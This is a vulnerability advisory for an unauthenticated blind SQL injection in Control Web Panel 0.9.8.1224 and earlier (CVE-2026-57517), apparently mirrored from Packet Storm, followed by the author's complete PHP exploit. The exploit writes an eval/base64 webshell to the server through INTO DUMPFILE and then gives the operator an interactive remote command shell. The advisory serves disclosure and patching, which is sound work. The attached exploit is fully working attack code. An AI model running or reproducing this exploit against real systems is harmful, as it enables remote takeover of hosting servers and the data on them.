## https://sploitus.com/exploit?id=PACKETSTORM:224887
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
[-] Software Link:
https://control-webpanel.com
[-] Affected Versions:
Version 0.9.8.1224 and prior versions.
[-] Vulnerability Description:
User input passed through the "userRes" POST parameter to
https://[CWP_Host]:2083/[CWP_Username]/
is not properly sanitized before being used to construct an SQL query. This
can be exploited by remote, unauthenticated attackers to carry out (blind)
SQL Injection attacks.
Successful exploitation of this vulnerability requires the attacker to know
or correctly guess the username of a valid non-root account on the affected
CWP instance.
NOTE: successful exploitation allows an unauthenticated attacker to execute
arbitrary SQL queries with the privileges of the MySQL root user. Because
this account possesses the global FILE privilege, the vulnerability can be
leveraged to write arbitrary files to writable locations on the underlying
filesystem using MySQL's file output capabilities (e.g., INTO DUMPFILE). By
writing a malicious PHP payload to the web-accessible
/usr/local/cwpsrv/var/services/roundcube/logs/ directory, an attacker might
be able to execute arbitrary PHP code remotely, resulting in full Remote
Code Execution (RCE) on the affected CWP instance with the privileges of
the 'cwpsvc' account.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/CVE-2026-57517.php
[-] Solution:
Upgrade to version 0.9.8.1225 or later.
[-] Disclosure Timeline:
[XX/YY/2025] - Vulnerability discovered
[06/05/2026] - Version 0.9.8.1225 released, issue fixed by the vendor
[26/06/2026] - CVE identifier requested
[26/06/2026] - CVE identifier assigned
[01/07/2026] - Public disclosure
[-] CVE Reference:
CVE-2026-57517 has been assigned to this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
--- packet storm attached poc ---
<?php
/*
---------------------------------------------------------------------
Control Web Panel <= 0.9.8.1224 (userRes) SQL Injection Vulnerability
---------------------------------------------------------------------
author..............: Egidio Romano aka EgiX
mail................: n0b0d13s[at]gmail[dot]com
software link.......: https://control-webpanel.com
+-------------------------------------------------------------------------+
| This proof of concept code was written for educational purpose only. |
| Use it at your own risk. Author will be not responsible for any damage. |
+-------------------------------------------------------------------------+
[-] Original Advisory:
https://karmainsecurity.com/KIS-2026-12
*/
set_time_limit(0);
error_reporting(E_ERROR);
print "+-----------------------------------------------------------------------+\n";
print "| Control Web Panel <= 0.9.8.1224 Remote Code Execution Exploit by EgiX |\n";
print "+-----------------------------------------------------------------------+\n";
if (!extension_loaded("curl")) die("\n[-] cURL extension required!\n\n");
if ($argc != 3)
{
print "\nUsage......: php $argv[0] <Hostname/IP> <Username>\n";
print "\nExample....: php $argv[0] 127.0.0.1 egix";
print "\nExample....: php $argv[0] cwp.victim.com bob\n\n";
die();
}
function hex_enc($input)
{
for ($i = 0; $i < strlen($input); $i++)
$encoded .= sprintf("%02x", ord($input[$i]));
return "0x{$encoded}";
}
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2083/{$argv[2]}/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, "http://127.0.0.1:8080");
print "\n[+] Injecting PHP webshell\n";
$sh_fname = uniqid() . ".php";
$phpshell = hex_enc("<?php eval(base64_decode(\$_SERVER['HTTP_C'])); ?>");
$injection = "\" UNION SELECT 1,{$phpshell},3,4,5,6,7,8,9,10,11,12,13 INTO DUMPFILE \"/usr/local/cwpsrv/var/services/roundcube/logs/{$sh_fname}\"#";
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["userRes" => $injection]));
curl_exec($ch);
print "[+] Executing PHP webshell\n";
$phpcode = "print '___CMD___'; passthru(base64_decode('%s')); print '___CMD___';";
curl_setopt($ch, CURLOPT_URL, "https://{$argv[1]}:2031/roundcube/logs/{$sh_fname}");
curl_setopt($ch, CURLOPT_POST, false);
while(1)
{
print "\ncwp-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: " . base64_encode(sprintf($phpcode, base64_encode($cmd)))]);
preg_match("/___CMD___(.*)___CMD___/s", curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}